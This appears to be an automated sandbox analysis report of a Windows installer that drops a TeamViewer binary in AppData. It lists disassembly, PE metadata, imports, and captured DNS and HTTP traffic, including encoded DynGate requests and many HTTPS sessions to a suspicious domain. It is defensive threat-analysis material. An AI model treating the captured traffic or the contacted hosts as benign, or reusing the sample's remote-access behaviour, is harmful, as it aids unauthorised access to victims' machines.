                                                                                                                                    call dword ptr [00407030h]
                                                                                                                                    push 00008001h
                                                                                                                                    call dword ptr [004070B4h]
                                                                                                                                    push ebx
                                                                                                                                    call dword ptr [0040727Ch]
                                                                                                                                    push 00000008h
                                                                                                                                    mov dword ptr [00423F58h], eax
                                                                                                                                    call 00007F586D1BE7BEh
                                                                                                                                    mov dword ptr [00423EA4h], eax
                                                                                                                                    push ebx
                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                    push 00000160h
                                                                                                                                    push eax
                                                                                                                                    push ebx
                                                                                                                                    push 0041F458h
                                                                                                                                    call dword ptr [00407158h]
                                                                                                                                    push 004091B8h
                                                                                                                                    push 004236A0h
                                                                                                                                    call 00007F586D1BE471h
                                                                                                                                    call dword ptr [004070B0h]
                                                                                                                                    mov edi, 00429000h
                                                                                                                                    push eax
                                                                                                                                    push edi
                                                                                                                                    call 00007F586D1BE45Fh
                                                                                                                                    push ebx
                                                                                                                                    call dword ptr [0040710Ch]
                                                                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                                                                    mov dword ptr [00423EA0h], eax
                                                                                                                                    mov eax, edi
                                                                                                                                    jne 00007F586D1BBBBCh
                                                                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                                                                    mov eax, 00429001h
                                                                                                                                    push dword ptr [esp+14h]
                                                                                                                                    push eax
                                                                                                                                    call 00007F586D1BDF52h
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [0040721Ch]
                                                                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                                                                    jmp 00007F586D1BBC15h
                                                                                                                                    cmp cl, 00000020h
                                                                                                                                    jne 00007F586D1BBBB8h
                                                                                                                                    inc eax
                                                                                                                                    cmp byte ptr [eax], 00000020h
                                                                                                                                    je 00007F586D1BBBACh
                                                                                                                                    cmp byte ptr [eax], 00000022h
                                                                                                                                    mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                                    Rich Headers

                                                                                                                                    Programming Language:
                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                    Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x44000 | 0xd628 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1bbf68 | 0x25f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                                    Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.375217013889 | SysEx File - | 4.24219639454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x20000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x44000 | 0xd628 | 0xd800 | False | 0.300600405093 | data | 5.06095919413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                    Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x442e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964862 | English | United States
RT_ICON | 0x48508 | 0x25a8 | data | English | United States
RT_ICON | 0x4aab0 | 0x2488 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x4cf38 | 0x1a68 | data | English | United States
RT_ICON | 0x4e9a0 | 0x10a8 | data | English | United States
RT_ICON | 0x4fa48 | 0x988 | data | English | United States
RT_ICON | 0x503d0 | 0x6b8 | data | English | United States
RT_ICON | 0x50a88 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x50ef0 | 0x202 | data | English | United States
RT_DIALOG | 0x510f8 | 0xf8 | data | English | United States
RT_DIALOG | 0x511f0 | 0xee | data | English | United States
RT_GROUP_ICON | 0x512e0 | 0x76 | data | English | United States
RT_MANIFEST | 0x51358 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                                                                                                    Imports

DLL | Import
KERNEL32.DLL | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                                    Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets


                                                                                                                                    UDP Packets


                                                                                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 13:51:18.570023060 CEST | 192.168.2.5 | 8.8.8.8 | 0x3592 | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:18.605724096 CEST | 192.168.2.5 | 8.8.8.8 | 0x8dca | Standard query (0) | ping3.dyngate.com | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:21.945890903 CEST | 192.168.2.5 | 8.8.8.8 | 0xaf6a | Standard query (0) | master15.teamviewer.com | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:24.049734116 CEST | 192.168.2.5 | 8.8.8.8 | 0x28e | Standard query (0) | outnegorave.info | A (IP address) | IN (0x0001)

                                                                                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 13:51:18.597867966 CEST | 8.8.8.8 | 192.168.2.5 | 0x3592 | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:18.636167049 CEST | 8.8.8.8 | 192.168.2.5 | 0x8dca | Name error (3) | ping3.dyngate.com | none | none | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:21.976309061 CEST | 8.8.8.8 | 192.168.2.5 | 0xaf6a | No error (0) | master15.teamviewer.com | | 185.188.32.25 | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:24.081706047 CEST | 8.8.8.8 | 192.168.2.5 | 0x28e | No error (0) | outnegorave.info | | 172.67.205.33 | A (IP address) | IN (0x0001)
Sep 15, 2021 13:51:24.081706047 CEST | 8.8.8.8 | 192.168.2.5 | 0x28e | No error (0) | outnegorave.info | | 104.21.77.64 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• outnegorave.info
• master15.teamviewer.com
• 178.255.154.140

HTTP Packets

| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49752 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 1 | 192.168.2.5 | 49755 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 10 | 192.168.2.5 | 49776 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 11 | 192.168.2.5 | 49782 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 12 | 192.168.2.5 | 49790 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 13 | 192.168.2.5 | 49799 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 14 | 192.168.2.5 | 49805 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 15 | 192.168.2.5 | 49806 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 16 | 192.168.2.5 | 49807 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 17 | 192.168.2.5 | 49808 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 18 | 192.168.2.5 | 49809 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 19 | 192.168.2.5 | 49810 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 2 | 192.168.2.5 | 49759 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 20 | 192.168.2.5 | 49811 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 21 | 192.168.2.5 | 49812 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 22 | 192.168.2.5 | 49813 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 23 | 192.168.2.5 | 49814 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 24 | 192.168.2.5 | 49815 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 25 | 192.168.2.5 | 49816 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 26 | 192.168.2.5 | 49817 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 27 | 192.168.2.5 | 49818 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 28 | 192.168.2.5 | 49819 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 29 | 192.168.2.5 | 49820 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 3 | 192.168.2.5 | 49760 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 30 | 192.168.2.5 | 49821 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 31 | 192.168.2.5 | 49822 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 32 | 192.168.2.5 | 49823 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 33 | 192.168.2.5 | 49824 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 34 | 192.168.2.5 | 49825 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 35 | 192.168.2.5 | 49826 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 36 | 192.168.2.5 | 49828 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 37 | 192.168.2.5 | 49829 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |
| 38 | 192.168.2.5 | 49833 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |

No Timestamp / kBytes transferred / Direction / Data rows are listed for sessions 0 to 38.


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 39 | 192.168.2.5 | 49746 | 185.188.32.25 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |

Timestamp | kBytes transferred | Direction | Data

Sep 15, 2021 13:51:22.014369011 CEST | 1051 | OUT

    GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master15.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache

Sep 15, 2021 13:51:22.036264896 CEST | 1051 | IN

    HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 33 39 32 36 30 37 30 31
    Data Ascii: $39260701

Sep 15, 2021 13:51:22.058674097 CEST | 1052 | OUT

    GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master15.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache

Sep 15, 2021 13:51:22.082068920 CEST | 1052 | IN

    HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0

Sep 15, 2021 13:51:22.084381104 CEST | 1052 | OUT

    GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master15.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache

Sep 15, 2021 13:51:22.105417967 CEST | 1053 | IN

    HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 16
    Data Raw: 17 24 13 0b 00 98 20 19 9c 98 98 19 98 9c 1b 9a
    Data Ascii: $


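| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49761 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |

No Timestamp / kBytes transferred / Direction / Data rows are listed for this session.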


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
|---|---|---|---|---|---|
| 40 | 192.168.2.5 | 49747 | 185.188.32.25 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe |

Timestamp | kBytes transferred | Direction | Data

Sep 15, 2021 13:51:22.142888069 CEST | 1053 | OUT

    GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master15.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache

Sep 15, 2021 13:51:22.165512085 CEST | 1054 | IN

    HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 33 39 32 36 30 37 31 30
    Data Ascii: $39260710

Sep 15, 2021 13:51:22.168787956 CEST | 1054 | OUT

    GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master15.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache

Sep 15, 2021 13:51:22.189806938 CEST | 1054 | IN

    HTTP/1.1 200 OK
    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-length: 0
                                                                                                                                    Sep 15, 2021 13:51:22.191895962 CEST1055OUTGET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: master15.teamviewer.com
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Sep 15, 2021 13:51:22.268311024 CEST1055INHTTP/1.1 200 OK
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Cache-control: no-cache, no-store
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    Content-length: 9
                                                                                                                                    Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                                    Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.5 | 49748 | 185.188.32.25 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:51:22.297791958 CEST | 1056 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.320568085 CEST | 1056 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 33 39 32 36 30 37 31 39
Data Ascii: $39260719
Sep 15, 2021 13:51:22.327142954 CEST | 1057 | OUT | GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.349551916 CEST | 1057 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:51:22.350593090 CEST | 1057 | OUT | GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.384879112 CEST | 1057 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 9
Data Raw: 17 24 13 04 00 98 20 27 a5
Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.5 | 49749 | 185.188.32.25 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:51:22.429137945 CEST | 1058 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.451570034 CEST | 1058 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 10
Data Raw: 17 24 33 39 32 36 30 37 33 36
Data Ascii: $39260736
Sep 15, 2021 13:51:22.455246925 CEST | 1059 | OUT | GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.480546951 CEST | 1059 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:51:22.486056089 CEST | 1059 | OUT | GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: master15.teamviewer.com
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.510013103 CEST | 1060 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 456


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.5 | 49750 | 178.255.154.140 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:51:22.551965952 CEST | 1061 | OUT | GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.575599909 CEST | 1061 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 17
Data Raw: 17 24 66 61 73 74 31 32 36 35 32 32 38 30
Data Ascii: $fast12652280
Sep 15, 2021 13:51:22.782339096 CEST | 1063 | OUT | POST /dout.aspx?s=12652280&p=10000002&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Content-Length: 500000
Connection: Keep-Alive
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.5 | 49751 | 178.255.154.140 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 13:51:22.604747057 CEST | 1062 | OUT | POST /dout.aspx?s=12652280&p=10000001&client=DynGate HTTP/1.1
Accept: */*
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Content-Length: 3
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.722681046 CEST | 1062 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-length: 0
Sep 15, 2021 13:51:22.791105032 CEST | 1063 | OUT | GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: 178.255.154.140
Connection: Keep-Alive
Cache-Control: no-cache
Sep 15, 2021 13:51:22.814366102 CEST | 1063 | IN | HTTP/1.1 200 OK
Pragma: no-cache
Cache-control: no-cache, no-store
Content-Type: application/octet-stream
Content-length: 500000
Data Raw: 17 24 11 04 00 05 c6 b3 a2
Data Ascii: $


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49762 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49763 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49764 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.5 | 49767 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.5 | 49770 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data


                                                                                                                                    HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
